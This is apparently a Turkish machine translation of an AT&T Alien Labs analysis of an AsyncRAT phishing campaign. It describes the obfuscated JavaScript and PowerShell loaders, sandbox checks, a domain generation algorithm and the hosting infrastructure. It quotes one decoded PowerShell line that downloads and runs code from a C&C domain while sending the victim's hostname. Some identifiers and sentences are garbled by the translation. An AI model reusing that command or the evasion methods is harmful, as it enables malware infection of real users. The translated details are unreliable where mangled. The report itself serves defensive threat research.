[By Fernando Martinez, Security Researcher, AT&T Alien Labs]
AT&T Alien Labs’ın araştırması, AsyncRAT’ı şüphelenmeyen kurban sistemlerine dağıtmak için bir kampanya belirledi. Bu tehdit aktörü en az 11 aydır Uzaktan Erişim Truva Atı’nı (RAT) bir kimlik avı sayfasına yerleştirilmiş bir başlangıç JavaScript dosyası aracılığıyla dağıtmak için çalışıyor. 300’den fazla örnek ve 100’den fazla alan adından sonra, tehdit aktörü niyetinde ısrarcıdır.
AsyncRAT nedir?
AsyncRAT, 2019’da piyasaya sürülen açık kaynaklı bir uzaktan erişim aracıdır ve hala Github’da mevcuttur. Herhangi bir uzaktan erişim aracında olduğu gibi, özellikle erişimin ve kullanımın ücretsiz olduğu bu durumda, Uzaktan Erişim Truva Atı olarak kullanılabilir. Bu nedenle en sık kullanılan RAT’lardan biridir; karakteristik unsurları arasında keylogging, sızma teknikleri ve/veya nihai yük dağıtımı için ilk erişim aşamaları yer alır.
İlk piyasaya sürülmesinden bu yana, bu RAT, açık kaynaklı yapısı nedeniyle çok sayıda değişiklikle çeşitli kampanyalarda ortaya çıktı ve hatta TrendMicro tarafından bildirildiği üzere APT Earth Berberoka tarafından bile kullanıldı.
AT&T Alien Labs, Eylül 2023’ün başlarında belirli şirketlerdeki belirli kişileri hedef alan kimlik avı e-postalarında bir artış gözlemledi. Gif eki bir svg dosyasına yol açtı; bu dosya aynı zamanda oldukça karmaşık bir JavaScript dosyasının indirilmesine, ardından diğer karmaşık PowerShell komut dosyalarının indirilmesine ve bir AsyncRAT istemcisinin son olarak çalıştırılmasına yol açtı. Bu tuhaflık aynı zamanda X’teki (eski adıyla Twitter) bazı kullanıcılar tarafından da bildirildi. reecDeep Ve Her Lytzki. Koddaki belirli modeller, bu kampanyada daha fazla örnek aramamıza ve aramamıza olanak tanıdı ve bu da örneklerin Şubat 2023’e kadar gitmesine yol açtı.
Nasıl çalışır
Yükleyicinin işleyiş şekli, ana AsyncRAT yükünü dağıtmadan önce kurbanın bir sanal alan olup olmadığını kontrol eden Komuta ve Kontrol (C&C) sunucusu tarafından daha da karmaşık hale getirilen birkaç aşamayı içerir. Özellikle, C&C sunucusu, genellikle 2. aşamadan sonra gönderilen parametrelere güvenmediğinde veya o sırada belirli bir etki alanında istek beklemediğinde, C&C, zararsız bir sayfaya yönlendirir.
Tüm kampanya boyunca, JavaScript dosyaları, kötü amaçlı kimlik avı web sayfaları aracılığıyla hedeflenen kurbanlara teslim edildi. Bu dosyalar, açıkça bir senaryo olmasına rağmen, yorumlanan uzun dizeler içeriyor; metinler rastgele konumlandırılmış kelimelerden oluşuyor; ‘Melville’, ‘kilise’, ‘bölüm’ ve ‘İskoç’ en çok tekrarlanan kelimeler.
Bu komut dosyası, tespit edilebilir komutlar/dizeler arasında hareket etmek için çeşitli işlevler ve C&C URL’sinin ondalık değerler biçiminde kodlanmasıyla oldukça karmaşıktır. URL’nin şifresini çözmek için komut dosyası, değerden bir sabit çıkarır ve sayıyı bir ASCII (veri kodlama) karakterine dönüştürür. Örneğin, aşağıdaki sayı dizisi (102 131 138 138 141 62 117 141 144 138 130 63), 30 ile çıkarılıp ASCII’ye dönüştürüldüğünde ‘Merhaba Dünya!’ dizisine karşılık gelir.
Tehdit aktörü, C&C’yi ve URL’yi sık sık değiştirmenin yanı sıra, her kurban için yükleyicinin tamamen yeni bir sürümünü oluşturmaya çalışır. Yeni dosyalar, yeni rastgeleleştirilmiş değişken adları veya URL’nin ASCII temsilini elde etmek için çıkarılmış yeni bir sabit taşır; bu da algılama tekniklerinin tutarlı bir şekilde gerçekleştirilmesini zorlaştırır.
Bir GET isteğinden sonra C&C, HTTP üzerinden bir komut dosyası gönderir. Bu komut dosyası base64 kodunu ve kodunu çözmek için gerekli işlevleri içerir. Daha sonra komut dosyasındaki sabit kodlanmış bir anahtara karşı “münhasıran or’lanır” (XOR’lanır), Gunzip ile paketi açılır ve yükü PowerShell’de dosyasız olarak yürütmek için belleğe kopyalanır. Bir kez daha, kodun tamamında uzun rastgele dizilere sahip değişkenler, şifrelenmiş ve ASCII’ye dönüştürülmesi gereken komutlar, ayrıca uç nokta tespit ve yanıtından (EDR), statik tespitlerden ve araştırmacılar tarafından yapılan analizlerden kaçacak işlevler bulunacak.
Kodun kodunun çözülmesi, şifresinin çözülmesi ve sıkıştırmasının açılmasından sonra, biten komut dosyası ” komutunda özetlenebilir.iex(curl -useb “http://sduyvzep[.]top/2.php?id=$env:bilgisayaradı&anahtar=$wiqnfex”)‘ Neresi ‘$env:bilgisayar adı’ kurbanın ana bilgisayar adıdır. İkinci değişken ‘$wiqnfex’ virüslü makinenin bir Sanal Makine veya Korumalı Alan olma olasılığını temsil eden yaklaşık 12 basamaklı bir sayıdır.
C&C, kurbanın bir VM veya Sandbox olabileceğini düşünürse AsyncRAT’a benzemeye çalışan bir tuzak örneği döndürür. Ancak örnek kaynak koda dönüştürüldüğünde “DecoyClient” olarak adlandırılıyor ve araştırmacılarla alay etmek amacıyla Rusça küfür veya değişken adı olarak “LOL” kullanılıyor.
AsyncRAT’ın Ağ Özelliklerini Anlamak
AsyncRAT kodu sürekli değişiyor, büyük ölçüde gizleniyor ve rastgele hale getiriliyor, bu da tespit edilmesini zorlaştırıyor. Ancak ağ altyapısı için durum böyle değil. Araştırmamıza göre AsyncRAT ile ilişkili çoğu alan yapısı birkaç ortak özelliği paylaşıyor:
- Üst Düzey Alan Adı (TLD): top
- 8 rastgele alfanümerik karakter
- Kayıt yaptıran kuruluş: ‘Nicenic.net, Inc’ (kayıt şirketi)
- Ülke kodu Güney Afrika (ZA)
- Kullanılmadan birkaç gün önce oluşturuldu
Benzer nadir özelliklere sahip alanlar araştırılırken (ve Anti-Sandbox analizi geçildiğinde), yeni bir alan kümesi ortaya çıkar. Bu örneklerde etki alanını geçerli tarihe göre hesaplamak için bir komut dosyası vardı. Bu, örneklerin C&C alanını zamanla otomatik olarak değiştirmesine ve kodun düzgün şekilde incelenmemesi durumunda engellenmeden kurtulmasına olanak tanır.
Etki Alanı Oluşturma Algoritması (DGA), yılın gününü kullanarak bir tohum oluşturur ve onu değiştirir. Bu değişikliklerin bir kısmı, her Pazar özel olarak oluşturulan yeni bir alan adı ile her yedi günde bir yeni bir alan adının doldurulmasını sağlar. Daha sonra bu tohum, alanı oluşturmak için ‘a’dan ‘n’ye kadar 15 harf seçmek için kullanılır. Tohumdaki diğer değişkenler (yani 2024 ve 6542) veya alanı oluşturmak için kullanılan karakterler, bazı komut dosyalarında farklı bir alan adı modeli oluşturmak için değişir.
Kayıt sahibinin eşleşen özelliklerinin yanı sıra Otonom Sistem Numaraları (ASN) da değerli veriler taşır. Ekibimizin gözlemlediği örneklerde sabit kodlanan ilk gruptaki alan adlarının tümü BitLaunch’ta barındırılırken, DGA alan adları DigitalOcean’da barındırıldı.
DigitalOcean, tanıtım gerektirmeyen çok popüler bir barındırma sağlayıcısıdır. BitLaunch ise yaygın kullanıcılar arasında pek bilinmiyor. 399629 tanımlayıcısına sahip bu ASN, Bitcoin, Ethereum veya Litecoin gibi kripto para birimleriyle ödeme yapılmasına izin vermesiyle biliniyor. Bu tür bir teklif tek başına kötü niyetli değildir ancak bu modelin çektiği kullanıcı türü, öncelikle kripto ile çalışan ve belirli kripto para birimlerini kullanmanın anonimliğinden yararlanabilen siber suçluları içerir. Ek olarak BitLaunch, DigitalOcean, Vultr veya linode ana bilgisayarlarındaki sunucular için ödeme köprüsü olarak kullanılabilir. En ucuz seçenek BitLaunch ile barındırmadır ancak alternatif, kullanıcıların kriptoyla ödeme yapmasına ve daha güvenilir bir ASN’de barındırılmasına olanak tanır.
DigitalOcean’da barındırılan DGA etki alanlarına geri dönersek, DGA etki alanlarında OTX tarafından oluşturulan tarama etkinliğine bakıldığında ‘BitLaunch LEMP uygulamasına hoş geldiniz’ mesajını içeren varsayılan bir web sayfası görüntülenir. LEMP kurulumunuzu yapılandırmak için sunucunuzda oturum açın.’ Bu, bu alan adlarının DigitalOcean’da barındırıldığının ancak ödemelerinin BitLaunch aracılığıyla yapıldığının bir göstergesi olabilir.
Genel olarak açıklanan kampanya, 2023 yılı boyunca yüzlerce farklı örnekle tehdit aktörlerinin kurbanlarına bulaştırma ve fark edilmeden kalma konusunda ne kadar kararlı olduklarını gösteriyor. Ayrıca örnekleri karartma ve üzerinde sürekli değişiklik yapma çabası, tehdit aktörlerinin takdir yetkisine ne kadar değer verdiğini gösteriyor. Ancak bu blog, oyuncuların yıl içindeki faaliyetlerini incelemenin, AT&T Alien Labs tarafından izlenen geniş bir model yelpazesine sahip herhangi bir yük ile geri döndüklerinde onları tanımlamamıza olanak tanıdığının canlı bir kanıtıdır.
Etki alanlarının kaydı ve sonraki AsyncRAT örnekleri, bu makalenin yazıldığı sırada hala gözlemlenmektedir.
Reklam